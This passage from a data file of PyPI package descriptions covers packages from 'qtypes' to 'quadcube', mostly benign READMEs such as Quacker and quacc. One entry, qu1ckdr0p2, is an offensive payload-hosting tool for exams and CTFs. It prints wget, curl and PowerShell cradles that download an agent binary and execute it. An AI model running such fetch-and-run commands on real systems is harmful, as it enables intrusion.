str\ntext_color: strEnumvalue: str\nallowed: List[str]Floatvalue: double\nunits: str\nminimum: double\nmaximum: double\ndecimals: intNote that units support works viapintIntegervalue: int\nminimum: int\nmaximum: intStringvalue: strExamplesqtypescomes with a few examples right out of the box.\nRun them using the python module syntax, e.g.:$python-mqtypes.examplesone_of_eachIncluded examples:exampledescriptionone_of_eachSimple example displaying one of each type with some inspection tools.unitsExample demonstrating units support for qtypes Float object."} +{"package": "qtypy", "pacakge-description": "quantipy"} +{"package": "qty-ranges", "pacakge-description": "No description available on PyPI."} +{"package": "qu", "pacakge-description": "Quickly generating unique url of a picture for markdown files.\u2624 QuickstartUpload an image file to qiniu:$ qu up /somewhere/1.png\n$ qu up /somewhere/1.png 2.pngSet configuration of qiniu:$ qu wc --access_key=AK --secret_key=SK --bucket_name=BN --domain_name=DNList local configuration of qiniu:$ qu sc\n$ qu sc --format-type json\u2624 InstallationYou can install \u201cqu\u201d via pip fromPyPI:$ pip install qu\u2624 Usage$ qu --help\nUsage: qu [OPTIONS] COMMAND [ARGS]...\n\n Quickly generating unique url of a picture for markdown files.\n\nOptions:\n --help Show this message and exit.\n\nCommands:\n dc Clear configuration of qiniu.\n sc Show configuration of qiniu.\n up Upload an image to qiniu.\n wc Set configuration of qiniu.\n\n\n$ qu wc --help\nUsage: qu wc [OPTIONS]\n\n Set configuration of qiniu.\n\nOptions:\n -ak, --access_key TEXT qiniu access_key.\n -sk, --secret_key TEXT qiniu secret_key.\n -bn, --bucket_name TEXT qiniu bucket_name.\n -dm, --domain_name TEXT qiniu domain_name.\n --help Show this message and exit.\n\n\n$ qu sc --help\nUsage: qu sc [OPTIONS]\n\n Show configuration of qiniu.\n\nOptions:\n --format-type [json|xml] output format type.\n --help Show this message and exit."} +{"package": "qu1ckdr0p2", "pacakge-description": "AboutRapidly host payloads and post-exploitation bins over HTTP or HTTPS.Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.Pull requests and issues welcome. As are any contributions.Qu1ckdr0p2 comes with an alias and search feature. The tools are located in thequ1ckdr0p2-toolsrepository. By default it will generate a self-signed certificate to use when using the--httpsoption, priority is also given to thetun0interface when the webserver is running, otherwise it will useeth0.Thecommon.inidefines the mapped aliases used within the--search and -uoptions.When the webserver is running there are several download cradles printed to the screen to copy and paste.InstallUsing pip is the only supported way of installingCloning this repository to install will probably break somethingpip3installqu1ckdr0p2\nservinit--updateExport as an alias if neededecho \"alias serv='~/.local/bin/serv'\" >> ~/.zshrc\nsource ~/.zshrcecho \"alias serv='~/.local/bin/serv'\" >> ~/.bashrc\nsource ~/.bashrcUsageServ a single file located in your current working directory$servserve-fimplant.bin--https443$servserve-ffile.example--http8080Update and help$serv--helpUsage:serv[OPTIONS]COMMAND[ARGS]...Welcometoqu1ckdr0p2entrypoint.\n\nOptions:--debugEnabledebugmode.--helpShowthismessageandexit.\n\nCommands:initPerformupdates.serveServefiles.$servserve--help\nUsage:servserve[OPTIONS]Servefiles.\n\nOptions:-l,--listListaliases-s,--searchTEXTSearchqueryforaliases-u,--useINTEGERUseanaliasbyadynamicnumber-f,--fileFILEServeafile--httpINTEGERUseHTTPwithacustomport--httpsINTEGERUseHTTPSwithacustomport-h,--helpShowthismessageandexit.$servinit--helpUsage:servinit[OPTIONS]Performupdates.\n\nOptions:--updateCheckanddownloadmissingtools.--update-selfUpdatethetoolusingpip.--update-self-testUsedfordevtesting,installsunstablebuild.--helpShowthismessageandexit.$servinit--update$servinit--update-selfServ a file from a mapped aliasThe mapped alias numbers for the-uoption are dynamic so you don't have to remember specific numbers or ever type out a tool name.$servserve--searchligolo[\u2192]Path:~/.qu1ckdr0p2/windows/agent.exe[\u2192]Alias:ligolo_agent_win[\u2192]Use:1[\u2192]Path:~/.qu1ckdr0p2/windows/proxy.exe[\u2192]Alias:ligolo_proxy_win[\u2192]Use:2[\u2192]Path:~/.qu1ckdr0p2/linux/agent[\u2192]Alias:ligolo_agent_linux[\u2192]Use:3[\u2192]Path:~/.qu1ckdr0p2/linux/proxy[\u2192]Alias:ligolo_proxy_linux[\u2192]Use:4(...)$servserve--searchligolo-u3--http80[\u2192]Serving:../../.qu1ckdr0p2/linux/agent[\u2192]Protocol:http[\u2192]IPaddress:192.168.1.5[\u2192]Port:80[\u2192]Interface:eth0[\u2192]CTRL+Ctoquit[\u2192]URL:http://192.168.1.5:80/agent[\u2193]csharp:$webclient=New-ObjectSystem.Net.WebClient;$webclient.DownloadFile('http://192.168.1.5:80/agent','c:\\windows\\temp\\agent');Start-Process'c:\\windows\\temp\\agent'[\u2193]wget:\nwgethttp://192.168.1.5:80/agent-O/tmp/agent&&chmod+x/tmp/agent&&/tmp/agent[\u2193]curl:\ncurlhttp://192.168.1.5:80/agent-o/tmp/agent&&chmod+x/tmp/agent&&/tmp/agent[\u2193]powershell:\nInvoke-WebRequest-Urihttp://192.168.1.5:80/agent-OutFilec:\\windows\\temp\\agent;Start-Processc:\\windows\\temp\\agent\n\n\u2827WebserverrunningLicenseMIT"} +{"package": "qu6zhi", "pacakge-description": "\ud83d\udce6 setup.py (for humans)This repo exists to providean example setup.pyfile, that can be used\nto bootstrap your next Python project. It includes some advanced\npatterns and best practices forsetup.py, as well as some\ncommented\u2013out nice\u2013to\u2013haves.For example, thissetup.pyprovides a$ python setup.py uploadcommand, which creates auniversal wheel(andsdist) and uploads\nyour package toPyPiusingTwine, without the need for an annoyingsetup.cfgfile. It also creates/uploads a new git tag, automatically.In short,setup.pyfiles can be daunting to approach, when first\nstarting out \u2014 even Guido has been heard saying, \"everyone cargo cults\nthems\". It's true \u2014 so, I want this repo to be the best place to\ncopy\u2013paste from :)Check out the example!Installationcdyour_project# Download the setup.py file:# download with wgetwgethttps://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py-Osetup.py# download with curlcurl-Ohttps://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.pyTo DoTests via$ setup.py test(if it's concise).Pull requests are encouraged!More ResourcesWhat is setup.py?on Stack OverflowOfficial Python Packaging User GuideThe Hitchhiker's Guide to PackagingCookiecutter template for a Python packageLicenseThis is free and unencumbered software released into the public domain.Anyone is free to copy, modify, publish, use, compile, sell, or\ndistribute this software, either in source code form or as a compiled\nbinary, for any purpose, commercial or non-commercial, and by any means."} +{"package": "qua", "pacakge-description": "QUA SDKPython SDK for QUAPulse level language for controlling a Quantum Computer"} +{"package": "quacc", "pacakge-description": "quacc\u2013 The Quantum Accelerator \ud83e\udd86quaccis a flexible platform for computational materials science \ud83d\udc8e and quantum chemistry \ud83e\uddea that is built for the big data era \ud83d\udd25. It is maintained by theRosen Research Groupat Princeton University.quaccmakes it possible to easily run pre-madecomputational materials science workflowsthat can be efficiently dispatched anywhere: locally, HPC, the cloud, or any combination thereof.quaccgives you the freedom of choice. Through a single, unified interface to several supportedworkflow management solutions, you can use what best suits your unique computing needs.quaccleverages community resources so we don't reinvent the wheel. It is built around the Atomic Simulation Environment and much of the software infrastructure powering the Materials Project.Documentation \ud83d\udcd6Learn More Here!... or skip straight to one of the following sections:\ud83d\udd27Installation Guide\ud83e\udde0User Guide\ud83e\udd1dDeveloper GuideVisual Example \u2728\ud83d\ude80 Representativequaccworkflow usingCovalentas one of the several supported workflow managers.Citation \ud83d\udcddIf you usequaccin your work, please cite it as follows:quacc \u2013 The Quantum Accelerator,https://doi.org/10.5281/zenodo.7720998.License \u2696\ufe0fquaccis released under aBSD 3-Clause license."} +{"package": "quack", "pacakge-description": "UNKNOWN"} +{"package": "quack-cli", "pacakge-description": "Quack CLIA simple CLI for interacting with Quackstack.Usagequack--help"} +{"package": "quackdns", "pacakge-description": "Keeps your DuckDNS IP information updated.Service to providing a basic updater for DuckDNS. Not recommended for production yet."} +{"package": "quacker", "pacakge-description": "QuackerQuackeris a streamlined command-line interface (CLI) tool designed to replicatedbtsourcesas tables from a Cloud DataWarehouseinto a localDuckDBdatabase. This allows for faster and more cost-effective local development with dbt.Quackercurrently support syncing from eitherSnowflakeBigQueryFeaturesReplicates dbtsourcesto localDuckDBfiles.Simplifies localdbtdevelopment and testing.Supports flexibleprojectandmanifestdirectory paths.Supports flexible dbttargets.Supports multipledatabasesfrom the samewarehouse.(Optional) syncstablecopies of selected dbtmodelsto a DuckDB file as well.Quick terminologywarehouse- A Cloud Data Warehouse e.g.Snowflake,BigQuerydatabase- The highest level of data organisation in awarehouse. In BigQuery adatabaseis called aproject.schema- A logical grouping oftableswithin adatabase. In BigQuery aschemais called adataset.Getting StartedPrerequisitesBefore usingQuacker, you need to have the following set up:Pythoninstalled[Recommended] Avenvvirtual environmentA validdbtproject with awarehousetargetprofileA validtargetfor yourwarehousein yourdbtprofiles.ymlfileThe following adapters installed:dbt-duckdbdbt-e.g.dbt-bigquery(Optional)environment variablesloaded if you are using them in your dbt project.DuckDB ProfileAn exampleduckdbtargetprofile in aprofiles.ymlis seen below.In this example, mydbtsourcesexist in twosnowflakedatabasesfivetran_databasesnowflakeArbitrarily I have chosenfivetran_databaseas the name of thedatabasealldbtoutput will materialize in, but any of thewarehousedatabasenames could have been used here. All others need to beattachedto themaindatabase(here: thedatabaseof the namesnowflake).dev_duckdb:type:duckdbpath:data_duckdb/fivetran_database.duckdbattach:-path:data_duckdb/snowflake.duckdbschema:\"{{env_var('SNOWFLAKE_SCHEMA')}}\"Note:Thepathin theduckdbtargetprofile needs to match theduckdb_folder_namein thequacker_config.ymlfile if you are overwriting the default value. SeeOptional Configurationfor more details.Environment VariablesIf yourdbtproject usesenvironment variables, you will need to load them before runningquack sync. This is becausequack syncreads yourprofileto find the connection details of yourwarehouse.somedbtsetups useenvironment variablesto store these connection details.Here is an example of atargetwhich uses environment variables to store the connection details to thewarehousedatabase.dev_snowflake:account:\"{{env_var('SNOWFLAKE_ACCOUNT')}}\"database:\"{{env_var('SNOWFLAKE_DATABASE')}}\"password:\"{{env_var('SNOWFLAKE_PASSWORD')}}\"role:\"{{env_var('SNOWFLAKE_ROLE')}}\"schema:\"{{env_var('SNOWFLAKE_SCHEMA')}}\"threads:24type:snowflakeuser:\"{{env_var('SNOWFLAKE_USERNAME')}}\"warehouse:\"{{env_var('SNOWFLAKE_WAREHOUSE')}}\"[Optional] Conditionally persist docs based on contextIf you have the below in yourdbt_project.yml, you will receive the following error when running against duckdbERROR: alter_column_comment macro not implemented for adapter duckdb:models:+persist_docs:relation:truecolumns:trueTherefore, you need to have it set to only persist when running against your non-duckdbtarget. E.g.:+persist_docs:relation:\"{{target.name=='dev_snowflake'}}\"columns:\"{{target.name=='dev_snowflake'}}\"[Optional] Make your dbt models agnosticSome sql syntax is not compatible withduckdb. For example, offset() is not supported induckdb. Therefore, if you have amodelthat usesoffset(), you will need to make it agnostic to thetargettype. This can be done usingjinjaandifstatements. For example, the below code will work for bothduckdbandbigquerytargets:{%iftarget.type=='bigquery'-%}split(hubspot_contact_email_address,'@')[offset(1)]ashubspot_contact_email_domain_extracted,{%-eliftarget.type=='duckdb'-%}split_part(hubspot_contact_email_address,'@',2)ashubspot_contact_email_domain_extracted{%-endif%}NoteIf you cannot make yourmodelagnostic to thetargettype, you can add it to themodels_to_ignorelist in thequacker_config.ymlfile. SeeOptional Configurationfor more details.Installation for usepip3installquacker[Optional] Configuration;quacker_config.ymlQuackercan be configured using aquacker_config.ymlfile. This file should be placed in the same location as yourdbt_project.ymlfile. However, you don't need to create this file if you are happy with the default configuration. Below are the things you can configure in thequacker_config.ymlfile.row_limitThe maximum number of rows to query from thewarehousedatabasefor each table to be created duringquack sync. It is recommended to set this to a small number, but not at the expense of missing important data. The default value is1,000.Examplequacker_config.yml:row_limit:100duckdb_folder_nameThe name of the folder where theduckdbfiles will be stored. The default value isdata_duckdb.If you change this value, you will also need to update thepathin yourduckdbtargetprofile in yourprofiles.ymlfile. SeeDuckDB Profilefor more details.Examplequacker_config.yml:duckdb_folder_name:my_duckdb_foldermodels_to_ignoreA list ofdbtmodels to \"ignore\". This is useful formodelsthat are not compatible withDuckDB. For example,modelsthat useUNNEST(BigQuery) orPythondbtmodels.While we are \"ignoring\" thesedbtmodels during we still need to be able to rundbtagainstDuckDBafter thesync. To do this, the ignoreddbtmodelsare replicated astablesin the main DuckDB file during thesync.Examplequacker_config.yml:models_to_ignore:-stg_shopify__customers# dbt model 1-int_core__customers# dbt model 2Note:When subsequently runningdbtagainstDuckDB, you will need to pass the--excludeargument during yourdbt runsto avoid materialising thesemodelsin yourduckdbdatabase(you need to \"ignore\" them). For example, to \"ignore\" the two models during dbt operations:dbt run --exclude stg_shopify__customers int_core__customers.If you are configuringmodels_to_ignore, you will also need this setting inquacker_config.ymlsoQuackerknows where tosyncignored models to. There are plans to remove this requirement in the future.main_duckdb_database_name:fivetran_databaseNote:If you are usingmodels_to_ignore, make sure that yourduckdbtargethas the sameschemaname as thewarehousetarget. Otherwise your subsequentdbt runsmight fail because some of thetablesthat yourmodelsreference withref()are in a differently namedschemathan expected.UsageTo start usingQuacker, run thequack synccommand with the appropriateoptionalflags:quacksync\\--project-dir\\--profiles-dir\\--manifest-dir\\--compile-targetOptional Argument Flags--project-dir:Relativepath to the directory containing yourdbt_project.ymlfile. If not specified evaluates to the current working directory.--profiles-dir:Fullpath to the directory containing yourprofiles.ymlfile. If not specified, path is resolvedusing dbt's method.--manifest-dir:Relativepath to the directory containing yourmanifest.jsonfile. If not specified, assumed to be intarget/relative to theproject-dir.--compile-target: The dbt target name to sync the data from. It's also the targetQuackeruses when runningdbt compilebefore extracting identifiers. If not specified,Quackeruses thedefaultprofile.Example Usagequacksync\\--project-dir.\\--profiles-dir/Users/username/path/to/profiles\\--manifest-dir../poc_duckdb_for_local_dev/target\\--compile-targetdev_snowflakedbt runafterquack syncIn order to run dbt locally against your DuckDB database, ensure you switch to using yourDuckDBtargetwhich should be configured like this. Otherwise yourdbtrunwill send queries to yourwarehouseinstead of yourDuckDBdatabase.HelpTo see the full list of available commands and arguments, runquack --helpe.g.quacksync--helpHow It Worksanyquackcommand performs the following steps:Reads and parses thequacker_config.ymlfile if it exists.quack syncperforms the following extra steps:Checks for the existence of a folder nameddata_duckdb/or the value ofduckdb_folder_nameinquacker_config.yml. If it does not exist, it creates it. This is where theduckdbfiles will be stored.Compiles thedbtproject.Parses themanifest.jsonfile to find identifiers of all dbtsourcesand, optionally, dbtmodelsspecifiedquacker_config.yml.Queries thewarehousedatabasefor allsourcesandmodels_to_ignorewith a cap of 1,000 rows or the value specified inrow_limitinquacker_config.yml. If any of thesourcesormodels_to_ignorehave more than this number of rows,Quackerwill randomly sample the data itsyncs.Saves the queried data intoDuckDBfiles. Forsources, oneduckdbfile is generated with the same name as thedatabasein thewarehouseinstance. Formodels_to_ignore, themainDuckDBfile (matching one of thesourcedatabases) is updated with themodel's data. See how the main file is specified in sectionDuckDB profile.After quack sync, theduckdbfiles will be stored in this general folder structure, with one database file perwarehousedatabase:data_duckdb/\n\u251c\u2500\u2500fivetran_database.duckdb\n\u251c\u2500\u2500snowflake.duckdb\n\u2514\u2500\u2500...LimitationsConcurrent access to DuckDB filesYou should not attempt to query the DuckDB database files whileQuackeris running a sync operation. Two processes cannot connect to the same duckdb file at the same time.The error raised will be something likeduckdb.duckdb.IOException:IOError:Couldnotsetlockonfile\"/Users/amir/Projects/poc_duckdb_for_local_dev/data_duckdb/fivetran_database.duckdb\":ResourcetemporarilyunavailablePossible future enhancementsUnsorted QA feedback to be refined (i.e., not necessarily made into a TODO)Rittman delivery team's qarundbt depsbefore compileadd note to README: - you need to have done a fulldbt runbefore running quacker sync if you are using themodels_to_ignoreconfigurationfor bigquerysync: usesamplefunction instead ofrandomAmir's own qadon\u2019t fail whenquacker_config.ymlexists but has nokeys(e.g. everything is commented out)Bugs to fixBigQuery: when asourceis atableconnected to a google sheet, this error occurs even if 1. theservice accounthas access to the sheet and 2. the same credentials work in thedbtprojectgoogle.api_core.exceptions.Forbidden: 403 Access Denied: BigQuery BigQuery: Permission denied while getting Drive credentials.Incrementality and full refreshIf a table already exists in the duckdb database, the query should no be run against the warehouse and data should not be overwritten in the duckdb database. Instead, a message should be displayed to the user to inform them that the table already exists.If the user wants to overwrite the data in the duckdb database, they should be able to pass afull-refreshflag to thequack synccommand to do so.Selective syncIf the user only wants to overwrite select tables in the duckdb database, they should further be able to pass a--tablesflag to thequack synccommand to do so.DuckDB profile check and creationIf no suitableduckdbtargetprofileexists, we could create one. This would involve:finding allduckdbtargets for theproject'sprofilechecking if any of the existing targets have all thesourcedatabasesand useattachif sources are split across multipledatabasesif none of thetargetsare suitable, creating a newduckdbtargetin theproject'sprofilereturning a message to the user to inform them of the newduckdbtargetprofileGifs for READMEAdd gifs to the README to show how to useQuackerand what it does.Emphasise side-by-side comparison of running dbt against warehouse vs duckdb afterQuackersyncError messagesTarget issuesWhen the--compile-targetis not of a supportedwarehousetypeProfiles.yml issuesWhen theprofiles.ymlfile is not found in the expected locationTODO write up more relevant error messages to implement as they are discoveredExtract the main DuckDB database name from the duckdb dbt profileThis would remove the need for themain_duckdb_database_namesetting inquacker_config.yml.Dealing with non-compatible dbt modelsphase 1 solution(done Jan 2024)Allow users to specify dbt models to ignore in a config file.Duringquack sync, replicate the ignored dbt models as tables in the main DuckDB file.phase 2 solutionTemporary until phase 4 solution is implementedadd subcommandquack recommend, which from the config generates the--excludeargument so they can manually use it when running dbt against duckdbphase 3 solutionAdd toquack recommend: suggest models to ignore based on incompatible syntax, such as UNNEST (BigQuery) or Python dbt models.phase 4 solution3- add aquack dbtcommand with args (for ignore functionality)Run dbt command passed in argument e.g.run,buildTo make this seamless use positional arguments if possible. E.g., command isquack dbt run --full-refresh. In this example, bothrunand--full-refreshare positional arguments.Might need to use some sort of (*args, **kwargs) solution here?Pass as an--exclude(?) on all the models which are ignored in the configexample dbt command generated and executed byQuacker:dbt run --full-refresh --exclude model1,model5Stop and inform user if they try toPass--excludethemselves down to dbtRun a dbt command which doesn't accept--excludeargdbt command failsphase 5 solution0-quack debugTODO should this functionality be added toquack recommendorquack syncinstead of a new command?Among others, warn if any of the ignored models are not tables in duckdb and suggest re-run of 'quack sync'Long-term solutionquack recommendcould generate DuckDB syntax equivalents wrapped in Jinja based on the target. For syntax not yet translated, it would fall back on the ignore recommendation.Debugging toolsDevelopquack debugto warn users of any ignored models that are not tables in DuckDB and suggest re-runningquack sync.Support for other databasesAs needed, we could add support for other databases in addition to the ones we currently support:Snowflake added Dec 2023BigQuery added Jan 2024Completed enhancementsSupport for table names with reserved SQL keywordsBefore this enhancement, if asourceormodelname contained a reserved SQL keyword, thequack synccommand would fail:if the database_type wassnowflake, on querying thewarehouseif the database_type wasbigquery, on creating the table in theduckdbdatabaseMorequacker_config.ymlsettings (done Jan 2024)Ability to customise row limit withrow_limitsetting inquacker_config.ymlAbility to customise the name of the folder where duckdb files are stored withduckdb_folder_namesetting inquacker_config.ymlRetrieve connection details from target profile(done Jan 2024)Extract the Snowflake credentials directly from the dbt profile, avoiding the need for separate environment variables.Investigate dbt's source code or dbt power users' methods for retrieving these credentials.failedInstead, manually code to replicate the order in which dbt searches for theprofiles.ymlfile (exact name).relevant dbt profile documentation:Specified using the--profiles-dirruntime argumentEnvironment VariableDBT_PROFILES_DIR: If you have set the DBT_PROFILES_DIR environment variable, dbt will use the directory specified in this variable to look for the profiles.yml fileCurrent Working Directory: The current working directory is the directory from which you are running the dbt command (where dbt_project.yml is)Default Directory~/.dbt/Simplifying sync(done Jan 2024)Specify compile sync target, such assnowflake-prodordev_snwflkwith--sync_targetargument.this wouldDevelopment and ContributionWe welcome contributions and feedback on our tool! Please reach out to me if you have any questions or would like to contribute:amir.jab.93+quacker@gmail.comPyPIQuacker is published toPyPIInstallation for developmentClone theQuackerrepository and install it usingpip(ideally in avenvvirtual environment):gitclonehttps://github.com//quacker.gitcdquacker\npip3install-e.The dot.represents the current directory. It can be replaced with a path to theQuackerrepository if you cloned it elsewhere. No matter whereQuackeris stored, you can run installed versions of it from anywhere on your machine as long as you are in the same virtual environment that you installed it in.The-eflag is optional and is used to installQuackerin editable mode, which is useful during development ofQuackeritself as it allows changes to be immediately effective without reinstallation. You don't need to use this flag if you are just usingQuacker.ContributorsAmir Jaber |GitHub|LinkedInSupportIf you encounter any issues or have questions, please open an issue in the project'sGitHub repository.LicenseQuackeris released under the MIT License."} +{"package": "quackify", "pacakge-description": "No description available on PyPI."} +{"package": "quackmyip", "pacakge-description": "quackmyipKeep your public IP address updated, when using theDuckDNSservice.RequirementsIn order to work, this program, needs the following Python 3 libraries:requests(tested with v2.12.4)urllib3(tested with v1.19.1)InstallationYou can usepipto install it:pip install quackmyipSyntaxusage: quackmyip [-h] FILE\n\nUpdate your IP address for your duckdns registered domain\n\npositional arguments:\n FILE The configuration file to use\n\n optional arguments:\n -h, --help show this help message and exitFor its usage, it's recommended to create a daily cron job!.ConfigurationPrior to its usage, a configuration file must be created, as shown in the following example:[duckdns]\ntoken = [YOUR_TOKEN]\ndomain = [YOUR_DOMAIN]"} +{"package": "quackpanda", "pacakge-description": "QuackPanda: SQL Capability for Pandas using DuckDB \ud83e\udd86\ud83d\udc3cquackpanda is a Python library designed to bring Spark-like SQL capabilities to Pandas DataFrames using DuckDB, allowing users to execute SQL queries and perform advanced database operations directly on DataFrames.FeaturesSeamless integration with DuckDB for executing SQL queries on Pandas DataFrames.\nEfficient registration of DataFrames as temporary tables.\nSupports a variety of SQL functionalities, offering flexibility in DataFrame manipulation.\nInstallation\nTo install quackpanda, use pip:pip install quackpandaQuick Start\nHere's a basic example of how to use quackpanda to register a DataFrame as a table and execute a SQL query:importpandasaspdfromquackpanda.coreimportQuackPanda# Create a sample DataFramedata={'Name':['Alice','Bob'],'Age':[25,30]}df=pd.DataFrame(data)# Initialize QuackPandaqp=QuackPanda()# Register DataFrame as a temporary tableqp.register_temp_table(df,'people')# Execute SQL queryresult_df=qp.execute_query('SELECT * FROM people WHERE Age > 25')# Display the resultprint(result_df)DocumentationFor detailed information on quackpanda's features and usage, please refer to the official documentation (add the link to your documentation).ContributingWe welcome contributions to quackpanda! Please see our Contributing Guide for more details.Support & FeedbackFor support, questions, or feedback, please submit an issue on GitHub.Licensequackpanda is licensed under the MIT License.AcknowledgmentsSpecial thanks to the creators and contributors of Pandas and DuckDB for their incredible work, which made quackpanda possible.Make sure to adapt the file paths, URLs, and other specific information to match your project's actual details. Also, consistently update the README as your project evolves, adding new sections or modifying existing ones as needed."} +{"package": "quackpass", "pacakge-description": "QuackPassWorld's most secure password thingle thangle.Setuppip install quackpassYou need to be using a version greater then 3.6 for this library to work.UsageCODEfromquackpassimportquackpassmanager=quackpass.LoginManager(salt=os.environ['salt'],mode=\"txt\",file=\"passwords.txt\")manager.add_user(\"test\",\"secretpassword\")user=manager.login()print(f\"Logged in as{user}\")OUTPUTUsername: test\nPassword: secretpassword\nLogged in as test"} +{"package": "quackprofile", "pacakge-description": "PyPi:https://pypi.org/project/quackprofile/This Package Is To Show How A Duck Can Get A Profile In A CompanyHow To InstallOpen CMD / TerminalpipinstallquackprofileHow To UseOpen Idle And Type\u2026..my=Profile('Quacker')my.hobby=['Youtuber','Play Games']print(my.name)my.show_email()my.show_myart()my.show_hobby()Made By LlamaIsTheBest Hope You Enjoy :D"} +{"package": "quackquack", "pacakge-description": "DocumentationOverviewThis project aims to resolve problem of configuring an application, which needs to\nhave initialization step (for example: for gathering settings or establishing\nconnections) and use Python style code (context managers and decorators) with\ndependency injection to get those data.For example, normally you would need to use two separate mechanism for connection\nto the database (one for web, and one for celery). Mostly it uses the web framework\nconfiguration, to use in the celery code. It is fine, until a third sub-application\narrives. Or you have many microservices, where web frameworks are different\ndepending on the microservice purpose.Second goal was to make synchronized code without any globals or magic. That is\nwhy using Quack Quack you know when the application is initialized (started),\nor where to look for code you are using.In order to use QQ, you don\u2019t need to use hacks in some starting files, like\nimporting something from django, starting the application, and the import the\nrest.Quick Using ExampleTo use Quack Quack you need to create the application class (inherited fromqq.Application) in which you need to add plugins. After configuring, you\nneed to \u201cstart\u201d (initialize)\nthe application. After that you can use the application as context manager.\nAlso, you can make simple decorator, so you can use injectors (dependency\ninjection) in function\u2019s arguments.fromqqimportApplicationfromqqimportApplicationInitializerfromqqimportContextfromqqimportSimpleInjectorfromqq.pluginsimportSettingsPluginfromqq.plugins.typesimportSettingsclassMyApplication(Application):defcreate_plugins(self):self.plugins[\"settings\"]=SettingsPlugin(\"settings\")application=MyApplication()application.start(\"application\")withContext(application)asctx:print(ctx[\"settings\"])app=ApplicationInitializer(application)@appdefsamplefun(settings:Settings=SimpleInjector(\"settings\")):print(settings)samplefun()samplefun({\"info\":\"fake settings\"})# dependency injection !!context[\"settings\"]in above example, is a variable made by the SettingsPlugin.\nIf you would like to know more, please go to theTutorialInstallationpipinstallquackquack"} +{"package": "quacks", "pacakge-description": "If it walks like a duck and it quacks like a duck, then it must be a duckThanks toPEP544, Python now has protocols:\na way to define duck typing statically.\nThis library gives you some niceties to make common idioms easier.Installationpipinstallquacks\u26a0\ufe0f For type checking to work withmypy, you\u2019ll need to enable the plugin in\nyourmypy config file:[mypy]plugins=quacksFeaturesEasy read-only protocolsDefining read-only protocols is great for encouraging immutability and\nworking with frozen dataclasses. Use thereadonlydecorator:fromquacksimportreadonly@readonlyclassUser(Protocol):id:intname:stris_premium:boolWithout this decorator, we\u2019d have to write quite a lot of cruft,\nreducing readability:classUser(Protocol):@propertydefid(self)->int:...@propertydefname(self)->str:...@propertydefis_premium(self)->bool:..."} +{"package": "quad", "pacakge-description": "QUAD: Quantum State DatabaseGraduate research project for CMSC 33550 (Introduction to Databases) at University of Chicago.Installation$pip3uninstallcirq# Fix possibly conflicting packages$pip3installquad# InstallUsageimportquaddimension=100store=quad.VectorStore('path/to/vector/database')# Load or create vector database# First time only: Add vectors to databaseforiinrange(10):prng=np.random.RandomState(i)base_vector=prng.normal(size=dimension)forjinrange(10):# Generate any vectorsvector=base_vector+np.random.normal(scale=0.05,size=dimension)info={'any-data':...}vid=store.add(vector,info)# Several hashes available: L2DistanceHash, MipsHash, StateVectorDistanceHashh=quad.lsh.L2DistanceHash.from_random(d=dimension,r=2.5,preproc_scale=1,)# Create locality sensitive collection of vectorscollection=quad.AsymmetricLocalCollection(vector_store=store,base_lsh=h,meta_hash_size=10,number_of_maps=10,prng=np.random.RandomState(seed=5),# Ensure consistent across runs)forvidinstore:collection.add(vid)# Query similar vectors:prng=np.random.RandomState(4)query_vector=prng.normal(size=dimension)# Some query vectorquery_vid=store.add(query_vector,{'type':'query'})norm=1#np.linalg.norm(query_vid)close_vids=set(collection.iter_local_buckets(query_vid,scale=1/norm))print('Possibly close vids:',close_vids)assertclose_vids==set(range(40,50))Benchmarks$gitclonehttps://github.com/cduck/quantum-state-database# Clone repo$cdquantum-state-database\n$pipinstall-e.[dev]# Install dev requirements$pythonquad/benchmark/benchmark_generate.py# Generate test state vector data$pytestquad/benchmark/# Run all benchmarks"} +{"package": "quadai", "pacakge-description": "No description available on PyPI."} +{"package": "quadax", "pacakge-description": "quadax is a library for numerical quadrature and integration using JAX.vmap-able,jit-able, differentiable.Scalar or vector valued integrands.Finite or infinite domains with discontinuities or singularities within the domain of integration.Globally adaptive Gauss-Konrod and Clenshaw-Curtis quadrature for smooth integrands (similar toscipy.integrate.quad)Adaptive tanh-sinh quadrature for singular or near singular integrands.Quadrature from sampled values using trapezoidal and Simpsons methods.Coming soon:Custom JVP/VJP rules (currently AD works by differentiating the loop which isn\u2019t the most efficient.)N-D quadrature (cubature)QMC methodsIntegration with weight functionsSparse grids (maybe, need to play with data structures and JAX)Installationquadax is installable withpip:pip install quadaxUsageimportjax.numpyasjnpimportnumpyasnpfromquadaximportquadgkf=lambdat:t*jnp.log(1+t)epsabs=epsrel=1e-14a,b=0,1y,info=quadgk(fun,[a,b],epsabs=epsabs,epsrel=epsrel)assertinfo.err>>importquadbin>>>longitude=-3.7038>>>latitude=40.4168>>>resolution=10>>>quadbin.point_to_cell(longitude,latitude,resolution)5234261499580514303APIFunctionis_valid_index(index)is_valid_cell(cell)cell_to_tile(cell)tile_to_cell(tile)cell_to_point(cell, geojson=False)point_to_cell(longitude, latitude, resolution)cell_to_boundary(cell, geojson=False)cell_to_bounding_box(cell)get_resolution(index)index_to_string(index)string_to_index(index)k_ring(origin, k)k_ring_distances(origin, k)cell_sibling(cell, direction)cell_to_parent(cell, parent_resolution)cell_to_children(cell, children_resolution)geometry_to_cells(geometry, resolution)cell_area(cell)DevelopmentMake commands:init: create the environment and install dependencieslint: run linter (flake8) + fix (black)test: run tests (pytest)publish-pypi: publish package in pypi.orgpublish-test-pypi: publish package in test.pypi.orgclean: remove the environmentNOTE: Python2 is supported to enable the usage in platforms likeAmazon Redshift."} +{"package": "quadcelldetector", "pacakge-description": "QuadCellDetectorA Python package designed to simulate the electronic response of a circular quadrant cell photodiode to the passage of a gaussian profile laser beam across its surface.OverviewThe package simulates circular quadrant cell detectors, where the quadrant cell is characterized by a radius, and a gap that separates the four active photocell quadrants. This code allows the user to specify the beam shape, the path the beam takes across the detector, and it will output the signals produced by the photodiode: the sum of all four quadrants, the top two minus the bottom two, and the left two minus the right two.InstallationYou can install this package with pip through our PyPi package with the commandpip install quadcelldetectorAlternatively, since we usepbrinsetup.py, you can install from this github repository withhttps://github.com/university-of-southern-maine-physics/QuadCellDetector.git\ncd QuadCellDetector\npip install .ExamplesTo see a complete demonstration of the library features, see theDetectorDemoJupyter notebook.How To Get Help (or Help Us)If you found a bug, have a question, or otherwise need to contact us, pleaseread this.If you want to help us in the development process, or have an idea,read this.ContributorsPaul NakroshisBen Montgomery"} +{"package": "quadcropper", "pacakge-description": "No description available on PyPI."} +{"package": "quadcube", "pacakge-description": "quadcubePython library (written in rust) that currently provide one methodpix2vecfor converting 